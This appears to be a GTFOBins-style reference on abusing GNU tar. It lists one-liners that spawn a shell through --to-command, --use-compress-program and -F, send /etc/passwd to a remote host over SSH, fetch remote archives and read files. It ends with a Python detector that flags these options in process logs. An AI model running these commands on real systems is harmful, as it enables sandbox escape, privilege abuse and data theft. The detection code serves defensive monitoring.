It can be used to break out from restricted environments by spawning an interactive system shell.
The --to-command option is normally used to pipe extracted files to a command. This can be used to run arbitrary commands on a host. The file must be a valid archive file.
tar xf /tmp/valid.tar --to-command='/bin/sh -c "sh <&2 1>&2"'
Similar to the above, but at a previous stage in the extraction. A valid archive is not required. This functionality can be abused in various ways for file-read and file-write (see below).
tar xf /dev/null --use-compress-program='/bin/sh -c "sh <&2 1>&2"'
GNU tar specific. The -F / --info-script= / --new-volume-script= arguments will run a command at volume rotation. The other flags are used to force frequent rotation.
tar cf /dev/null --record-size=512 -L1 -F'/bin/sh -c "sh <&2 1>&2"' /tmp/
It can exfiltrate files on the network.
This only works for GNU tar. Create a tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
tar cvf remote_user@remote_host.com:/tmp/remote_file.tar /etc/passwd --rsh-command=/bin/ssh
It can download remote files.
GNU tar has remote archive capabilities, which can be used to download and extract remote archives. The remote machine should have the rmt utility installed and configured.
tar xvf remote_user@remote_host.com:/tmp/remote_file --rsh-command=/bin/ssh
It reads data from files; it may be used to do privileged reads or disclose files outside a restricted file system.
The --use-compress-program flag can be abused to read files.
tar xf /etc/passwd --use-compress-program='/bin/sh -c "echo hello > /tmp/file"'
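As an added defensive example, not code from GTFOBins or GNU tar: a small Python detector that covers every invocation above (the shell, file upload, file download and file read variants alike). It parses tar command lines taken from process-execution records and flags the options that make tar execute a command (--to-command, --use-compress-program / -I, -F / --info-script / --new-volume-script) or reach a remote host (--rsh-command, or a [user@]host:path archive given with -f / --file). The log line format, timestamps and user names are constructed for the example; -I as the alias of --use-compress-program, the old-style "tar xvf" cluster syntax and the set of argument-taking short options are GNU tar's documented behaviour.

```python
"""Flag tar invocations that run a helper command or reach a remote host.

Added example for this page, not code from GTFOBins or GNU tar. It parses
tar command lines from process-execution records (constructed
"<ts> <user> <cmdline>" lines below stand in for auditd/EDR events) and
reports the options discussed above. Tuned for recall: a hit means "review
this", not "confirmed abuse"; backup jobs legitimately use -I and -f host:.
"""
import re
import shlex

COMMAND_LONG_OPTS = {
    "--to-command": "command run for every extracted file",
    "--use-compress-program": "command run as (de)compressor",
    "--info-script": "command run at volume change",
    "--new-volume-script": "command run at volume change",
    "--rsh-command": "command used to reach a remote archive",
}
# Short aliases GNU tar documents: -I = --use-compress-program,
# -F = --info-script / --new-volume-script.
COMMAND_SHORT_OPTS = {"I": "--use-compress-program", "F": "--info-script"}
# GNU tar short options that take an argument (per `tar --help`); needed to
# walk clusters such as -xvIcmd or old-style "xvf archive" correctly.
SHORT_OPTS_WITH_ARG = set("bCfFgHIKLNTVX")
# [user@]host:path names a remote archive unless --force-local is given.
REMOTE_ARCHIVE_RE = re.compile(r"^([\w.-]+@)?[\w.-]+:\S*$")


def _check_archive(value, force_local, findings):
    if not force_local and REMOTE_ARCHIVE_RE.match(value):
        findings.append(("remote archive (rsh/ssh transport)", value))


def _walk_cluster(letters, argv, i, old_style, force_local, findings):
    """Walk one option cluster; return the index of the last argv word used.
    New style (-xvIcmd): the first argument-taking letter swallows the rest
    of the cluster, else the next word. Old style (xvf archive): each
    argument-taking letter takes the next word in turn."""
    for k, letter in enumerate(letters):
        if letter not in SHORT_OPTS_WITH_ARG:
            continue
        value = "" if old_style else letters[k + 1:]
        if not value and i + 1 < len(argv):
            i += 1
            value = argv[i]
        if letter in COMMAND_SHORT_OPTS:
            reason = COMMAND_LONG_OPTS[COMMAND_SHORT_OPTS[letter]]
            findings.append((reason, f"-{letter} {value}"))
        elif letter == "f":
            _check_archive(value, force_local, findings)
        if not old_style:
            break
    return i


def analyse_tar_argv(argv):
    """Return [(reason, option text), ...] for one tar argv; [] if nothing."""
    findings = []
    if not argv or argv[0].rsplit("/", 1)[-1] != "tar":
        return findings
    force_local = "--force-local" in argv
    i = 1
    if len(argv) > 1 and not argv[1].startswith("-"):  # old-style "tar xvf ..."
        i = _walk_cluster(argv[1], argv, 1, True, force_local, findings) + 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--"):
            name, eq, value = arg.partition("=")
            if name in COMMAND_LONG_OPTS or name == "--file":
                if not eq and i + 1 < len(argv):
                    i += 1
                    value = argv[i]
                if name == "--file":
                    _check_archive(value, force_local, findings)
                else:
                    findings.append((COMMAND_LONG_OPTS[name], f"{name}={value}"))
        elif arg.startswith("-") and len(arg) > 1:
            i = _walk_cluster(arg[1:], argv, i, False, force_local, findings)
        i += 1
    return findings


def scan_log(text):
    """Return [(ts, user, findings), ...] for every record that trips a rule."""
    hits = []
    for line in filter(None, text.splitlines()):
        ts, user, cmdline = line.split(" ", 2)
        try:
            findings = analyse_tar_argv(shlex.split(cmdline))
        except ValueError:  # unbalanced quoting: still worth a human look
            findings = [("unparseable command line", cmdline)]
        if findings:
            hits.append((ts, user, findings))
    return hits


# Constructed sample records (not real telemetry): "<ts> <user> <cmdline>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z backup tar czf /var/backups/etc.tgz /etc
2024-05-01T10:00:02Z www-data tar xf /tmp/valid.tar --to-command='/bin/sh -c "sh <&2 1>&2"'
2024-05-01T10:00:03Z alice tar -xzvf /home/alice/photos.tgz -C /home/alice
2024-05-01T10:00:04Z www-data tar cf /dev/null --record-size=512 -L1 -F'/bin/sh -c "sh <&2 1>&2"' /tmp/
2024-05-01T10:00:05Z backup tar cvf remote_user@remote_host.com:/tmp/remote_file.tar /etc/passwd --rsh-command=/bin/ssh
"""

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

Running it on the sample records flags the three lines from this page and leaves the two ordinary backup and extract lines alone. Two caveats for a real rule set: GNU tar's option parser accepts any unambiguous abbreviation of a long option and also reads options from the TAR_OPTIONS environment variable, neither of which this command-line check sees, so pair it with a process-ancestry rule (a tar process spawning a shell) rather than relying on argument matching alone.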